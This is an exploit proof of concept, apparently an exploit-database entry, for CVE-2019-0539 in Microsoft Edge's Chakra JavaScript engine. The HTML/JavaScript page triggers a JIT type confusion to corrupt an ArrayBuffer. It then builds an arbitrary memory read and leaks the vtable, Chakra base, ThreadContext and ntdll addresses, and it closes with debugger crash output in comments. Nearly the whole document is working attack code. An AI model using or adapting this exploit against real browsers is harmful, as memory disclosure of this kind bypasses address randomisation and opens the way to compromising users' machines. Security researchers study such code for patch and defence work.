Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

<html>
<script>

/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi 
 * cve-2019-0539
 * Getting Read &_^
 * date 27 Feb , 2019 

*/

var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);

var BASE = 0x100000000;

function hex(x) {
    return `0x${x.toString(16)}`
}

function bytes_to_u64(bytes) {
    return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
                +bytes[4]*0x100000000+bytes[5]*0x10000000000);
}

function i2f(x) {
    u32[0] = x % BASE;

    u32[1] = (x - (x % BASE)) / BASE;



    return f64[0];
}


function f2i(x) {
    f64[0] = x;
    return u32[0] + BASE * u32[1];
}


obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90; 
obj.i = 0x90;

t = new ArrayBuffer(0x200);
newL = 0x1000;

hax = new ArrayBuffer(0x2000);
read_me = 0;


function hit_to_read(t){

    obj.h = hax; // set ta->buffer to hax
    obj.i = newL; // update target's length
    read_me = new Float64Array(t);

    return read_me;

}

  function read(r,read_me)
    {



        read_me[7] = i2f(r); // setup hax->buffer
        //hax = new ArrayBuffer(0x1000);
        return  hex(f2i(read_me[7])) 
  
    }



function cout(f){return document.write(f);}
function opt(o, c, value) {
   o.c = 1
   //o.a = "HELLO"
  // o.b = 3;
    //o.e = 1
    class A extends c {

    }

    o.a = value // will overwrite rcx , rdx , rax
    //o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
    //o.b = 0x42424242
    o.c = 555555
   // o.d = 4

}


function pwn() {

    for (let i = 0; i < 0x1000; i++) {
        let o = {a: 1, b: 2,c:3};
        opt(o, (function () {}), {});
    }

    let o = {a: 2222, b: 2,c:4,d:5};
    let cons = function () {};

    cons.prototype = o;
    /* line 120 
                        auxSlots *p 
    __Vfptr | type | 0x00000001234     | 0x0
    */

    opt(o, cons, obj);


    o.f = t

    read_me = hit_to_read(t);

    cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
    vtable = hex(f2i(read_me[0]));

    buffer_addr = f2i(read_me[7]);

    Chakrabase = hex(vtable  - 0x59a3c0)

   cout("<br>")
   cout("[+] ChakraBase : " + Chakrabase)


    cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))

    ThreadContext = read(Chakrabase - 0xffec5448,read_me)
    Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
    cout("<br>")
    cout("[+] ThreadContext : " + ThreadContext)
    cout("<br>")
    cout("[+] Ntdl : " + Ntdll)
    
    
}

pwn();


/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/

/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/
</script></html>